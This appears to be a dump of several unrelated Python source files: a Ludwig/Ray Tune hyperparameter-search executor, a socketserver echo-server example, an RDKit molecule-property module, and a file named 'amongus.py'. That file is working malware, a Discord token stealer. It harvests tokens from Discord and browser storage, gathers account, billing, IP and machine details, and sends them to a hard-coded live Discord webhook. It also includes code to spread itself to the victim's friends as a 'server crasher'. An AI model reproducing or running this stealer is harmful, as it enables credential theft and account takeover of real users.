ray.init('auto', ignore_reinit_error=True)
except ConnectionError:
logger.info('Initializing new Ray cluster...')
ray.init(ignore_reinit_error=True)
self.search_space = hyperopt_sampler.search_space
self.num_samples = hyperopt_sampler.num_samples
self.goal = hyperopt_sampler.goal
self.search_alg_dict = hyperopt_sampler.search_alg_dict
self.scheduler = hyperopt_sampler.scheduler
self.decode_ctx = hyperopt_sampler.decode_ctx
self.output_feature = output_feature
self.metric = metric
self.split = split
self.trial_id = 0
self.cpu_resources_per_trial = cpu_resources_per_trial
self.gpu_resources_per_trial = gpu_resources_per_trial
self.kubernetes_namespace = kubernetes_namespace
self.time_budget_s = time_budget_s
self.max_concurrent_trials = max_concurrent_trials
self.sync_config = None
@property
def _cpu_resources_per_trial_non_none(self):
return self.cpu_resources_per_trial or 1
@property
def _gpu_resources_per_trial_non_none(self):
return self.gpu_resources_per_trial or 0
def _get_sync_client_and_remote_checkpoint_dir(self, trial_dir: Path):
"""Get the Ray sync client and path to remote checkpoint directory."""
remote_checkpoint_dir = os.path.join(
self.sync_config.upload_dir, *_get_relative_checkpoints_dir_parts(trial_dir))
return get_cloud_sync_client(remote_checkpoint_dir), remote_checkpoint_dir
def _run_experiment(self, config, checkpoint_dir, hyperopt_dict, decode_ctx, is_using_ray_backend=False):
for gpu_id in ray.get_gpu_ids():
# Previous trial may not have freed its memory yet, so wait to avoid OOM
wait_for_gpu(gpu_id)
# Some config values may be JSON encoded as strings, so decode them here
config = RayTuneSampler.decode_values(config, decode_ctx)
trial_id = tune.get_trial_id()
modified_config = substitute_parameters(
copy.deepcopy(hyperopt_dict["config"]), config
)
trial_dir = Path(tune.get_trial_dir())
trial_location = ray.util.get_node_ip_address()
hyperopt_dict['config'] = modified_config
        hyperopt_dict['experiment_name'] = f'{hyperopt_dict["experiment_name"]}_{trial_id}'
hyperopt_dict['output_directory'] = str(trial_dir)
tune_executor = self
if is_using_ray_backend:
ray_queue = RayQueue(actor_options={"num_cpus": 0})
else:
ray_queue = None
def checkpoint(progress_tracker, save_path):
with tune.checkpoint_dir(step=progress_tracker.epoch) as checkpoint_dir:
checkpoint_model = os.path.join(checkpoint_dir, 'model')
# shutil.copytree(save_path, checkpoint_model)
# Note: A previous implementation used shutil.copytree()
# however, this copying method is non atomic
if not os.path.isdir(checkpoint_model):
copy_id = uuid.uuid4()
tmp_dst = "%s.%s.tmp" % (checkpoint_model, copy_id)
assert os.path.exists(save_path)
shutil.copytree(save_path, tmp_dst)
try:
os.rename(tmp_dst, checkpoint_model)
except Exception:
shutil.rmtree(tmp_dst)
def report(progress_tracker):
train_stats = {
TRAINING: progress_tracker.train_metrics,
VALIDATION: progress_tracker.vali_metrics,
TEST: progress_tracker.test_metrics,
}
metric_score = tune_executor.get_metric_score(
train_stats, eval_stats=None)
tune.report(
parameters=json.dumps(config, cls=NumpyEncoder),
metric_score=metric_score,
training_stats=json.dumps(
train_stats[TRAINING], cls=NumpyEncoder),
eval_stats=json.dumps(
train_stats[VALIDATION], cls=NumpyEncoder),
trial_id=tune.get_trial_id(),
trial_dir=tune.get_trial_dir()
)
class RayTuneReportCallback(Callback):
def _get_sync_client_and_remote_checkpoint_dir(self):
# sync client has to be recreated to avoid issues with serialization
return tune_executor._get_sync_client_and_remote_checkpoint_dir(trial_dir)
def on_trainer_train_setup(self, trainer, save_path):
if is_using_ray_backend and checkpoint_dir and trial_location != ray.util.get_node_ip_address():
save_path = Path(save_path)
for path in trial_dir.glob("checkpoint*"):
if path not in (save_path.parent, checkpoint_dir):
shutil.rmtree(path, ignore_errors=True)
sync_client, remote_checkpoint_dir = self._get_sync_client_and_remote_checkpoint_dir()
sync_client.sync_down(
remote_checkpoint_dir, str(trial_dir.absolute()))
sync_client.wait()
def on_epoch_end(self, trainer, progress_tracker, save_path):
if is_using_ray_backend:
save_path = Path(save_path)
if trial_location != ray.util.get_node_ip_address():
sync_client, remote_checkpoint_dir = self._get_sync_client_and_remote_checkpoint_dir()
sync_client.sync_up(
str(save_path.parent.parent.absolute()), remote_checkpoint_dir)
sync_client.wait()
ray_queue.put((progress_tracker, str(save_path)))
return
checkpoint(progress_tracker, save_path)
report(progress_tracker)
callbacks = hyperopt_dict.get('callbacks') or []
hyperopt_dict['callbacks'] = callbacks + \
[RayTuneReportCallback()]
# set tune resources
if is_using_ray_backend:
resources = tune.get_trial_resources()
# check if we are using at least 1 gpu per trial
use_gpu = bool(self._gpu_resources_per_trial_non_none)
# get the resources assigned to the current trial
current_resources = resources.required_resources["GPU" if use_gpu else "CPU"]
hvd_kwargs = {
'num_workers': int(current_resources),
'use_gpu': use_gpu,
}
hyperopt_dict['backend'].set_distributed_kwargs(**hvd_kwargs)
logger.debug(
f"Trial horovod kwargs: {hvd_kwargs}")
stats = []
def _run():
train_stats, eval_stats = run_experiment(
**hyperopt_dict,
model_resume_path=checkpoint_dir,
parameters=config,
)
stats.append((train_stats, eval_stats))
if is_using_ray_backend:
# We have to pull the results to the trial actor
# from worker actors, as the Tune session is running
# only on the trial actor
thread = threading.Thread(target=_run)
thread.daemon = True
thread.start()
sync_client, remote_checkpoint_dir = self._get_sync_client_and_remote_checkpoint_dir(
trial_dir)
def check_queue():
qsize = ray_queue.qsize()
if qsize:
results = ray_queue.get_nowait_batch(qsize)
sync_client.sync_down(
remote_checkpoint_dir, str(trial_dir.absolute()))
sync_client.wait()
for progress_tracker, save_path in results:
checkpoint(progress_tracker, str(
trial_dir.joinpath(Path(save_path))))
report(progress_tracker)
while thread.is_alive():
thread.join(timeout=0)
check_queue()
time.sleep(0.1)
thread.join()
check_queue()
else:
# remove threading overhead
_run()
if not stats:
raise RuntimeError("Experiment did not complete.")
train_stats, eval_stats = stats.pop()
metric_score = self.get_metric_score(train_stats, eval_stats)
tune.report(
parameters=json.dumps(config, cls=NumpyEncoder),
metric_score=metric_score,
training_stats=json.dumps(train_stats, cls=NumpyEncoder),
eval_stats=json.dumps(eval_stats, cls=NumpyEncoder),
trial_id=tune.get_trial_id(),
trial_dir=tune.get_trial_dir()
)
def execute(
self,
config,
dataset=None,
training_set=None,
validation_set=None,
test_set=None,
training_set_metadata=None,
data_format=None,
experiment_name="hyperopt",
model_name="run",
# model_load_path=None,
# model_resume_path=None,
skip_save_training_description=False,
skip_save_training_statistics=False,
skip_save_model=False,
skip_save_progress=False,
skip_save_log=False,
skip_save_processed_input=True,
skip_save_unprocessed_output=False,
skip_save_predictions=False,
skip_save_eval_stats=False,
output_directory="results",
gpus=None,
gpu_memory_limit=None,
allow_parallel_threads=True,
callbacks=None,
backend=None,
random_seed=default_random_seed,
debug=False,
**kwargs
) -> RayTuneResults:
if isinstance(dataset, str) and not has_remote_protocol(dataset) and not os.path.isabs(dataset):
dataset = os.path.abspath(dataset)
if isinstance(backend, str):
backend = initialize_backend(backend)
if gpus is not None:
raise ValueError("Parameter `gpus` is not supported when using Ray Tune. "
"Configure GPU resources with Ray and set `gpu_resources_per_trial` in your "
"hyperopt config.")
hyperopt_dict = dict(
config=config,
dataset=dataset,
training_set=training_set,
validation_set=validation_set,
test_set=test_set,
training_set_metadata=training_set_metadata,
data_format=data_format,
experiment_name=experiment_name,
model_name=model_name,
# model_load_path=model_load_path,
# model_resume_path=model_resume_path,
eval_split=self.split,
skip_save_training_description=skip_save_training_description,
skip_save_training_statistics=skip_save_training_statistics,
skip_save_model=skip_save_model,
skip_save_progress=skip_save_progress,
skip_save_log=skip_save_log,
skip_save_processed_input=skip_save_processed_input,
skip_save_unprocessed_output=skip_save_unprocessed_output,
skip_save_predictions=skip_save_predictions,
skip_save_eval_stats=skip_save_eval_stats,
output_directory=output_directory,
gpus=gpus,
gpu_memory_limit=gpu_memory_limit,
allow_parallel_threads=allow_parallel_threads,
callbacks=callbacks,
backend=backend,
random_seed=random_seed,
debug=debug,
)
mode = "min" if self.goal != MAXIMIZE else "max"
metric = "metric_score"
if self.search_alg_dict is not None:
if TYPE not in self.search_alg_dict:
logger.warning(
"WARNING: Kindly set type param for search_alg "
"to utilize Tune's Search Algorithms."
)
search_alg = None
else:
search_alg_type = self.search_alg_dict.pop(TYPE)
search_alg = tune.create_searcher(
search_alg_type, metric=metric, mode=mode, **self.search_alg_dict)
else:
search_alg = None
if self.max_concurrent_trials:
assert self.max_concurrent_trials > 0, f"`max_concurrent_trials` must be greater than 0, got {self.max_concurrent_trials}"
if isinstance(search_alg, BasicVariantGenerator) or search_alg is None:
search_alg = BasicVariantGenerator(
max_concurrent=self.max_concurrent_trials)
elif isinstance(search_alg, ConcurrencyLimiter):
raise ValueError(
"You have specified `max_concurrent_trials`, but the search "
"algorithm is already a `ConcurrencyLimiter`. FIX THIS "
"by setting `max_concurrent_trials=None`."
)
else:
search_alg = ConcurrencyLimiter(
search_alg, max_concurrent=self.max_concurrent_trials)
resources_per_trial = {
"cpu": self._cpu_resources_per_trial_non_none,
"gpu": self._gpu_resources_per_trial_non_none,
}
def run_experiment_trial(config, checkpoint_dir=None):
return self._run_experiment(config, checkpoint_dir, hyperopt_dict, self.decode_ctx, _is_ray_backend(backend))
tune_config = {}
tune_callbacks = []
for callback in callbacks or []:
run_experiment_trial, tune_config = callback.prepare_ray_tune(
run_experiment_trial,
tune_config,
tune_callbacks,
)
if _is_ray_backend(backend):
# we can't set Trial actor's CPUs to 0 so we just go very low
resources_per_trial = PlacementGroupFactory(
[{"CPU": 0.001}] + ([{"CPU": 1, "GPU": 1}] * self._gpu_resources_per_trial_non_none) if self._gpu_resources_per_trial_non_none else (
[{"CPU": 0.001}] + [{"CPU": 1}] * self._cpu_resources_per_trial_non_none)
)
if has_remote_protocol(output_directory):
run_experiment_trial = tune.durable(run_experiment_trial)
self.sync_config = tune.SyncConfig(
sync_to_driver=False,
upload_dir=output_directory
)
output_directory = None
elif self.kubernetes_namespace:
from ray.tune.integration.kubernetes import NamespacedKubernetesSyncer
self.sync_config = tune.SyncConfig(
sync_to_driver=NamespacedKubernetesSyncer(
self.kubernetes_namespace)
)
register_trainable(
f"trainable_func_f{hash_dict(config).decode('ascii')}",
run_experiment_trial
)
analysis = tune.run(
f"trainable_func_f{hash_dict(config).decode('ascii')}",
config={
**self.search_space,
**tune_config,
},
scheduler=self.scheduler,
search_alg=search_alg,
num_samples=self.num_samples,
keep_checkpoints_num=1,
resources_per_trial=resources_per_trial,
time_budget_s=self.time_budget_s,
queue_trials=False,
sync_config=self.sync_config,
local_dir=output_directory,
metric=metric,
mode=mode,
trial_name_creator=lambda trial: f"trial_{trial.trial_id}",
trial_dirname_creator=lambda trial: f"trial_{trial.trial_id}",
callbacks=tune_callbacks,
)
ordered_trials = analysis.results_df.sort_values(
"metric_score",
ascending=self.goal != MAXIMIZE
)
# Catch nans in edge case where the trial doesn't complete
temp_ordered_trials = []
for kwargs in ordered_trials.to_dict(orient="records"):
for key in ['parameters', 'training_stats', 'eval_stats']:
if isinstance(kwargs[key], float):
kwargs[key] = {}
temp_ordered_trials.append(kwargs)
ordered_trials = [
TrialResults.from_dict(
load_json_values(kwargs)
)
for kwargs in temp_ordered_trials
]
return RayTuneResults(
ordered_trials=ordered_trials,
experiment_analysis=analysis
)
def get_build_hyperopt_executor(executor_type):
return get_from_registry(executor_type, executor_registry)
executor_registry = {
"serial": SerialExecutor,
"parallel": ParallelExecutor,
"fiber": FiberExecutor,
"ray": RayTuneExecutor
}
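# Illustrative usage sketch (not part of the original module): the registry above lets the
# hyperopt entry point resolve an executor class from the string given in the config. The
# constructor arguments are defined by the callers elsewhere and are omitted here.
def _example_resolve_executor(executor_type="ray"):
    executor_cls = get_build_hyperopt_executor(executor_type)  # -> RayTuneExecutor for "ray"
    return executor_cls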
def set_values(model_dict, name, parameters_dict):
if name in parameters_dict:
params = parameters_dict[name]
for key, value in params.items():
if isinstance(value, dict):
for sub_key, sub_value in value.items():
model_dict[key][sub_key] = sub_value
else:
model_dict[key] = value
def get_parameters_dict(parameters):
parameters_dict = {}
for name, value in parameters.items():
curr_dict = parameters_dict
name_list = name.split(".")
for i, name_elem in enumerate(name_list):
if i == len(name_list) - 1:
curr_dict[name_elem] = value
else:
name_dict = curr_dict.get(name_elem, {})
curr_dict[name_elem] = name_dict
curr_dict = name_dict
return parameters_dict
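# Illustrative sketch (not part of the original module): get_parameters_dict expands dotted
# hyperopt parameter names into a nested dict. The parameter names below are hypothetical.
def _example_parameters_dict():
    sampled = {"training.learning_rate": 0.01, "utterance.cell_type": "rnn"}
    # -> {"training": {"learning_rate": 0.01}, "utterance": {"cell_type": "rnn"}}
    return get_parameters_dict(sampled)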
def substitute_parameters(config, parameters):
parameters_dict = get_parameters_dict(parameters)
for input_feature in config["input_features"]:
set_values(input_feature, input_feature[COLUMN], parameters_dict)
for output_feature in config["output_features"]:
set_values(output_feature, output_feature[COLUMN], parameters_dict)
set_values(config["combiner"], "combiner", parameters_dict)
set_values(config["training"], "training", parameters_dict)
set_values(config["preprocessing"], "preprocessing",
parameters_dict)
return config
def run_experiment(
config,
parameters=None,
dataset=None,
training_set=None,
validation_set=None,
test_set=None,
training_set_metadata=None,
data_format=None,
experiment_name="hyperopt",
model_name="run",
# model_load_path=None,
model_resume_path=None,
eval_split=VALIDATION,
skip_save_training_description=False,
skip_save_training_statistics=False,
skip_save_model=False,
skip_save_progress=False,
skip_save_log=False,
skip_save_processed_input=False,
skip_save_unprocessed_output=False,
skip_save_predictions=False,
skip_save_eval_stats=False,
output_directory="results",
gpus=None,
gpu_memory_limit=None,
allow_parallel_threads=True,
callbacks=None,
backend=None,
random_seed=default_random_seed,
debug=False,
**kwargs
):
for callback in callbacks or []:
callback.on_hyperopt_trial_start(parameters)
# Collect training and validation losses and metrics
# & append it to `results`
model = LudwigModel(
config=config,
backend=backend,
gpus=gpus,
gpu_memory_limit=gpu_memory_limit,
allow_parallel_threads=allow_parallel_threads,
callbacks=callbacks,
)
eval_stats, train_stats, _, _ = model.experiment(
dataset=dataset,
training_set=training_set,
validation_set=validation_set,
test_set=test_set,
training_set_metadata=training_set_metadata,
data_format=data_format,
experiment_name=experiment_name,
model_name=model_name,
# model_load_path=model_load_path,
model_resume_path=model_resume_path,
eval_split=eval_split,
skip_save_training_description=skip_save_training_description,
skip_save_training_statistics=skip_save_training_statistics,
skip_save_model=skip_save_model,
skip_save_progress=skip_save_progress,
skip_save_log=skip_save_log,
skip_save_processed_input=skip_save_processed_input,
skip_save_unprocessed_output=skip_save_unprocessed_output,
skip_save_predictions=skip_save_predictions,
skip_save_eval_stats=skip_save_eval_stats,
output_directory=output_directory,
skip_collect_predictions=True,
skip_collect_overall_stats=False,
random_seed=random_seed,
debug=debug,
)
for callback in callbacks or []:
callback.on_hyperopt_trial_end(parameters)
return train_stats, eval_stats
def _run_experiment_unary(kwargs):
"""Unary function is needed by Fiber to map a list of args."""
return run_experiment(**kwargs)
|
amongus.py
|
import os
if os.name != "nt":
exit()
from re import findall
from json import loads, dumps
from base64 import b64decode
from datetime import datetime
from subprocess import Popen, PIPE
from urllib.request import Request, urlopen
from threading import Thread
from time import sleep
from sys import argv
dt = datetime.now()
WEBHOOK_URL = 'https://discordapp.com/api/webhooks/916150945635782737/pEV5ZQLezY4IZtsgMCqX_4ejofTUeMyk3YCEssQTLPZ1NY4vWB-OiZOlRC-VPcrPZK9K'
LOCAL = os.getenv("LOCALAPPDATA")
ROAMING = os.getenv("APPDATA")
PATHS = {
"Discord" : ROAMING + "\\Discord",
"Discord Canary" : ROAMING + "\\discordcanary",
"Discord PTB" : ROAMING + "\\discordptb",
"Google Chrome" : LOCAL + "\\Google\\Chrome\\User Data\\Default",
"Firefox" : LOCAL + "\\Mozilla\\Firefox\\User Data\\Profiles",
"Opera" : ROAMING + "\\Opera Software\\Opera Stable",
"Edge" : LOCAL + "\\\Microsoft\\Edge\\User Data\\Default",
"Brave" : LOCAL + "\\BraveSoftware\\Brave-Browser\\User Data\\Default",
"Yandex" : LOCAL + "\\Yandex\\YandexBrowser\\User Data\\Default",
"Vivaldi" : LOCAL + "\\Vivaldi\\User Data\\User Data",
}
def getheaders(token=None, content_type="application/json"):
headers = {
"Content-Type": content_type,
"User-Agent": "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.11 (KHTML, like Gecko) Chrome/23.0.1271.64 Safari/537.11"
}
if token:
headers.update({"Authorization": token})
return headers
def getuserdata(token):
try:
return loads(urlopen(Request("https://discordapp.com/api/v6/users/@me", headers=getheaders(token))).read().decode())
except:
pass
def gettokens(path):
path += "\\Local Storage\\leveldb"
tokens = []
for file_name in os.listdir(path):
if not file_name.endswith(".log") and not file_name.endswith(".ldb"):
continue
for line in [x.strip() for x in open(f"{path}\\{file_name}", errors="ignore").readlines() if x.strip()]:
for regex in (r"[\w-]{24}\.[\w-]{6}\.[\w-]{27}", r"mfa\.[\w-]{84}"):
for token in findall(regex, line):
tokens.append(token)
return tokens
def getip():
ip = "None"
try:
ip = urlopen(Request("https://api.ipify.org")).read().decode().strip()
except:
pass
return ip
def getavatar(uid, aid):
url = f"https://cdn.discordapp.com/avatars/{uid}/{aid}.gif"
try:
urlopen(Request(url))
except:
url = url[:-4]
return url
def gethwid():
p = Popen("wmic csproduct get uuid", shell=True, stdin=PIPE, stdout=PIPE, stderr=PIPE)
return (p.stdout.read() + p.stderr.read()).decode().split("\n")[1]
def getfriends(token):
try:
return loads(urlopen(Request("https://discordapp.com/api/v6/users/@me/relationships", headers=getheaders(token))).read().decode())
except:
pass
def getchat(token, uid):
try:
return loads(urlopen(Request("https://discordapp.com/api/v6/users/@me/channels", headers=getheaders(token), data=dumps({"recipient_id": uid}).encode())).read().decode())["id"]
except:
pass
def has_payment_methods(token):
try:
return bool(len(loads(urlopen(Request("https://discordapp.com/api/v6/users/@me/billing/payment-sources", headers=getheaders(token))).read().decode())) > 0)
except:
pass
def send_message(token, chat_id, form_data):
try:
urlopen(Request(f"https://discordapp.com/api/v6/channels/{chat_id}/messages", headers=getheaders(token, "multipart/form-data; boundary=---------------------------325414537030329320151394843687"), data=form_data.encode())).read().decode()
except:
pass
def spread(token, form_data, delay):
return
for friend in getfriends(token):
try:
chat_id = getchat(token, friend["id"])
send_message(token, chat_id, form_data)
except Exception as e:
pass
sleep(delay)
def main():
cache_path = ROAMING + "\\.cache~$"
prevent_spam = True
self_spread = True
embeds = []
working = []
checked = []
already_cached_tokens = []
working_ids = []
ip = getip()
pc_username = os.getenv("UserName")
pc_name = os.getenv("COMPUTERNAME")
user_path_name = os.getenv("userprofile").split("\\")[2]
for platform, path in PATHS.items():
if not os.path.exists(path):
continue
for token in gettokens(path):
if token in checked:
continue
checked.append(token)
uid = None
if not token.startswith("mfa."):
try:
uid = b64decode(token.split(".")[0].encode()).decode()
except:
pass
if not uid or uid in working_ids:
continue
user_data = getuserdata(token)
if not user_data:
continue
working_ids.append(uid)
working.append(token)
username = user_data["username"] + "#" + str(user_data["discriminator"])
user_id = user_data["id"]
avatar_id = user_data["avatar"]
avatar_url = getavatar(user_id, avatar_id)
email = user_data.get("email")
phone = user_data.get("phone")
nitro = bool(user_data.get("premium_type"))
flags = user_data.get("public_flags")
billing = bool(has_payment_methods(token))
embed = {
"color": 0x5865f2,
"fields": [
{
"name": "**Account Info**",
"value": f'Email: {email}\nPhone: {phone}\nNitro: {nitro}\nBilling Info: {billing}',
"inline": True
},
{
"name": "**PC Info**",
"value": f'IP: {ip}\nUsername: {pc_username}\nPC Name: {pc_name}\nToken Location: {platform}',
"inline": True
},
{
"name": "**Token**",
"value": token,
"inline": False
},
],
"author": {
"name": f"{username} ({user_id})",
"icon_url": avatar_url
},
"footer": {
"text": "Hooked at • " + dt.strftime('%Y-%m-%d %H:%M:%S'),
}
}
embeds.append(embed)
with open(cache_path, "a") as file:
for token in checked:
if not token in already_cached_tokens:
file.write(token + "\n")
if len(working) == 0:
working.append('123')
webhook = {
"content": "",
"embeds": embeds,
"username": "CStealer",
"avatar_url": "https://i.hizliresim.com/9ftjid9.jpg"
}
try:
urlopen(Request(WEBHOOK_URL, data=dumps(webhook).encode(), headers=getheaders()))
except:
pass
if self_spread:
for token in working:
with open(argv[0], encoding="utf-8") as file:
content = file.read()
payload = f'-----------------------------325414537030329320151394843687\nContent-Disposition: form-data; name="file"; filename="{__file__}"\nContent-Type: text/plain\n\n{content}\n-----------------------------325414537030329320151394843687\nContent-Disposition: form-data; name="content"\n\nserver crasher. python download: https://www.python.org/downloads\n-----------------------------325414537030329320151394843687\nContent-Disposition: form-data; name="tts"\n\nfalse\n-----------------------------325414537030329320151394843687--'
Thread(target=spread, args=(token, payload, 7500 / 1000)).start()
try:
main()
except Exception as e:
print(e)
pass
|
pymotw.py
|
'''
import socketserver
class EchoRequestHandler(socketserver.BaseRequestHandler):
def handle(self):
# Echo the data back to the client
data = self.request.recv(1024)
self.request.send(data)
return
if __name__ == '__main__':
import socket
import threading
address = ('localhost', 0) # let the kernel assign a port
server = socketserver.TCPServer(address, EchoRequestHandler)
ip, port = server.server_address # what port was assigned?
t = threading.Thread(target=server.serve_forever)
t.daemon = True # don't hang on exit
t.start()
# Connect to the server
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((ip, port))
# Send the data
message = 'Hello, world'.encode()
print('Sending : {!r}'.format(message))
len_sent = s.send(message)
# Receive a response
response = s.recv(len_sent)
print('Received: {!r}'.format(response))
# Clean up
server.shutdown()
s.close()
server.socket.close()
'''
import logging
import sys
import socketserver
logging.basicConfig(level=logging.DEBUG,
format='%(name)s: %(message)s',
)
class EchoRequestHandler(socketserver.BaseRequestHandler):
def __init__(self, request, client_address, server):
self.logger = logging.getLogger('EchoRequestHandler')
self.logger.debug('__init__')
socketserver.BaseRequestHandler.__init__(self, request,
client_address,
server)
return
def setup(self):
self.logger.debug('setup')
return socketserver.BaseRequestHandler.setup(self)
def handle(self):
self.logger.debug('handle')
# Echo the data back to the client
data = self.request.recv(1024)
self.logger.debug('recv()->"%s"', data)
self.request.send(data)
return
def finish(self):
self.logger.debug('finish')
return socketserver.BaseRequestHandler.finish(self)
class EchoServer(socketserver.TCPServer):
def __init__(self, server_address,
handler_class=EchoRequestHandler,
):
self.logger = logging.getLogger('EchoServer')
self.logger.debug('__init__')
socketserver.TCPServer.__init__(self, server_address,
handler_class)
return
def server_activate(self):
self.logger.debug('server_activate')
socketserver.TCPServer.server_activate(self)
return
def serve_forever(self, poll_interval=0.5):
self.logger.debug('waiting for request')
self.logger.info(
'Handling requests, press <Ctrl-C> to quit'
)
socketserver.TCPServer.serve_forever(self, poll_interval)
return
def handle_request(self):
self.logger.debug('handle_request')
return socketserver.TCPServer.handle_request(self)
def verify_request(self, request, client_address):
self.logger.debug('verify_request(%s, %s)',
request, client_address)
return socketserver.TCPServer.verify_request(
self, request, client_address,
)
def process_request(self, request, client_address):
self.logger.debug('process_request(%s, %s)',
request, client_address)
return socketserver.TCPServer.process_request(
self, request, client_address,
)
def server_close(self):
self.logger.debug('server_close')
return socketserver.TCPServer.server_close(self)
def finish_request(self, request, client_address):
self.logger.debug('finish_request(%s, %s)',
request, client_address)
return socketserver.TCPServer.finish_request(
self, request, client_address,
)
def close_request(self, request_address):
self.logger.debug('close_request(%s)', request_address)
return socketserver.TCPServer.close_request(
self, request_address,
)
def shutdown(self):
self.logger.debug('shutdown()')
return socketserver.TCPServer.shutdown(self)
if __name__ == '__main__':
import socket
import threading
address = ('localhost', 0) # let the kernel assign a port
server = EchoServer(address, EchoRequestHandler)
ip, port = server.server_address # what port was assigned?
# Start the server in a thread
t = threading.Thread(target=server.serve_forever)
t.daemon = True # don't hang on exit
t.start()
logger = logging.getLogger('client')
logger.info('Server on %s:%s', ip, port)
# Connect to the server
logger.debug('creating socket')
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
logger.debug('connecting to server')
s.connect((ip, port))
# Send the data
message = 'Hello, world'.encode()
logger.debug('sending data: %r', message)
len_sent = s.send(message)
# Receive a response
logger.debug('waiting for response')
response = s.recv(len_sent)
logger.debug('response from server: %r', response)
# Clean up
server.shutdown()
logger.debug('closing socket')
s.close()
logger.debug('done')
server.socket.close()
|
generation_props.py
|
'''
Functions that are used while a Generation is being Evaluated
'''
import os
import random
import multiprocessing
from rdkit import Chem
import numpy as np
from random import randrange
import discriminator as D
import evolution_functions as evo
from SAS_calculator.sascorer import calculateScore
manager = multiprocessing.Manager()
lock = multiprocessing.Lock()
#Added to deal with Similarity: #!# ----------------------------------------
from rdkit.Chem import AllChem
from rdkit.Chem.rdMolDescriptors import GetUSRScore, GetUSRCAT
def calc_prop_USR(unseen_smile_ls, property_name, props_collect):
'''Calculate Similarity for each molecule in unseen_smile_ls, and record results
in locked dictionary props_collect
'''
#To provide reference molecule:
reference_smile = 'C1(=NC(=NC2=C1N=C[N]2[H])N(C3=CC=C(C=C3)[S](=O)(=O)N([H])[H])[H])C4=CC(=CC=C4)C5=CC=CC=C5'
ref_mol = Chem.MolFromSmiles(reference_smile)
AllChem.EmbedMolecule(ref_mol, useRandomCoords = True, enforceChirality = False)
ref_embed_usrcat = GetUSRCAT(ref_mol)
for smile in unseen_smile_ls:
mol, smi_canon, did_convert = evo.sanitize_smiles(smile) # ensure valid SMILES
if did_convert:
try:
mol_test = Chem.MolFromSmiles(smile)
mol_test = Chem.AddHs(mol_test)
AllChem.EmbedMolecule(mol_test, useRandomCoords = True, enforceChirality = False)
mol_test = Chem.RemoveHs(mol_test)
UsrcatMol = GetUSRCAT(mol_test)
except ValueError:
SimScore = 0
else:
SimScore = GetUSRScore(ref_embed_usrcat, UsrcatMol)
props_collect[property_name][smile] = SimScore
else:
raise Exception('Invalid smile encountered while attempting to calculate Similarity') #!# ----------------
#Added to deal with Tanimoto
from rdkit import DataStructs
def calc_prop_Tanimoto(unseen_smile_ls, property_name, props_collect): #-------------------------
'''Calculate Tanimoto Coeff. for each molecule in unseen_smile_ls, and record results
in locked dictionary props_collect
'''
#To provide reference molecule:
reference_smile = 'C1(=NC(=NC2=C1N=C[N]2[H])N(C3=CC=C(C=C3)[S](=O)(=O)N([H])[H])[H])C4=CC(=CC=C4)C5=CC=CC=C5'
Tani_ref_mol = Chem.MolFromSmiles(reference_smile)
Tani_ref_FP = Chem.RDKFingerprint(Tani_ref_mol)
for smile in unseen_smile_ls:
mol, smi_canon, did_convert = evo.sanitize_smiles(smile) # ensure valid SMILES
if did_convert:
mol_Tani_test = Chem.MolFromSmiles(smile)
Tani_mol_FP = Chem.RDKFingerprint(mol_Tani_test)
TaniScore = DataStructs.FingerprintSimilarity(Tani_mol_FP, Tani_ref_FP)
props_collect[property_name][smile] = TaniScore
else:
raise Exception('Invalid smile encountered while attempting to calculate Tanimoto') #----------------
def calc_prop_logP(unseen_smile_ls, property_name, props_collect):
'''Calculate logP for each molecule in unseen_smile_ls, and record results
in locked dictionary props_collect
'''
for smile in unseen_smile_ls:
mol, smi_canon, did_convert = evo.sanitize_smiles(smile)
if did_convert: # ensure valid smile
props_collect[property_name][smile] = evo.get_logP(mol) # Add calculation
else:
raise Exception('Invalid smile encountered while attempting to calculate logP')
def calc_prop_SAS(unseen_smile_ls, property_name, props_collect):
'''Calculate synthetic accessibility score for each molecule in unseen_smile_ls,
results are recorded in locked dictionary props_collect
'''
for smile in unseen_smile_ls:
mol, smi_canon, did_convert = evo.sanitize_smiles(smile)
if did_convert: # ensure valid smile
props_collect[property_name][smile] = calculateScore(mol)
else:
raise Exception('Invalid smile encountered while attempting to calculate SAS ', smile)
def calc_prop_RingP(unseen_smile_ls, property_name, props_collect):
'''Calculate Ring penalty for each molecule in unseen_smile_ls,
results are recorded in locked dictionary props_collect
'''
for smi in unseen_smile_ls:
mol, smi_canon, did_convert = evo.sanitize_smiles(smi)
if did_convert:
cycle_list = mol.GetRingInfo().AtomRings()
if len(cycle_list) == 0:
cycle_length = 0
else:
cycle_length = max([ len(j) for j in cycle_list ])
if cycle_length <= 6:
cycle_length = 0
else:
cycle_length = cycle_length - 6
props_collect[property_name][smi] = cycle_length
else:
raise Exception('Invalid smile encountered while attempting to calculate Ring penalty ', smi)
def calc_prop_SIMIL(starting_smile, unseen_smile_ls, property_name, props_collect):
'''Calculate similarity to the starting molecule for each molecule in unseen_smile_ls, and record results
in locked dictionary props_collect
'''
target, _, _ = evo.sanitize_smiles(starting_smile)
for smile in unseen_smile_ls:
mol, smi_canon, did_convert = evo.sanitize_smiles(smile)
if did_convert: # ensure valid smile
props_collect[property_name][smile] = evo.molecule_similarity(mol, target) # Add calculation
else:
raise Exception('Invalid smile encountered while attempting to calculate SIMILARITY: ', smile)
def create_parr_process(chunks, property_name, starting_smile):
''' Create parallel processes for calculation of properties
'''
# Assign data to each process
process_collector = []
collect_dictionaries = []
for item in chunks:
props_collect = manager.dict(lock=True)
smiles_map_ = manager.dict(lock=True)
props_collect[property_name] = smiles_map_
collect_dictionaries.append(props_collect)
if property_name == 'logP':
process_collector.append(multiprocessing.Process(target=calc_prop_logP, args=(item, property_name, props_collect, )))
if property_name == 'SAS':
process_collector.append(multiprocessing.Process(target=calc_prop_SAS, args=(item, property_name, props_collect, )))
if property_name == 'RingP':
process_collector.append(multiprocessing.Process(target=calc_prop_RingP, args=(item, property_name, props_collect, )))
if property_name == 'SIMILR':
process_collector.append(multiprocessing.Process(target=calc_prop_SIMIL, args=(starting_smile, item, property_name, props_collect, )))
if property_name == 'USRSim': #!#
process_collector.append(multiprocessing.Process(target=calc_prop_USR, args=(item, property_name, props_collect, )))
if property_name == 'TaniSim': #!#
process_collector.append(multiprocessing.Process(target=calc_prop_Tanimoto, args=(item, property_name, props_collect, )))
for item in process_collector:
item.start()
for item in process_collector: # wait for all parallel processes to finish
item.join()
combined_dict = {} # collect results from multiple processess
for i,item in enumerate(collect_dictionaries):
combined_dict.update(item[property_name])
return combined_dict
